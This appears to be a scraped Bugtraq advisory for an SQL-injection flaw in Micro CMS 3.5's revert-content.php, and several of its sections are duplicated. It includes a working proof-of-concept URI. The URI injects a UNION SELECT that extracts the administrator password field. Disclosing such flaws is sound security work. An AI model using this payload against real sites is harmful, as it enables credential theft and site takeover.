Micro CMS Revert-Content.PHP SQL Injection Vulnerability
BID:25470
Info
Micro CMS Revert-Content.PHP SQL Injection Vulnerability
| Bugtraq ID: | 25470 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 28 2007 12:00AM |
| Updated: | Aug 28 2007 12:00AM |
| Credit: | R00T[ATI] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Implied By Design Micro CMS 3.5 |
| Not Vulnerable: | |
Discussion
Micro CMS Revert-Content.PHP SQL Injection Vulnerability
Micro CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Micro CMS 3.5 is vulnerable; other versions may also be affected.
Micro CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Micro CMS 3.5 is vulnerable; other versions may also be affected.
Exploit / POC
Micro CMS Revert-Content.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*
Solution / Fix
Micro CMS Revert-Content.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Micro CMS Revert-Content.PHP SQL Injection Vulnerability
References:
References:
- Micro CMS Homepage (Implied By Design)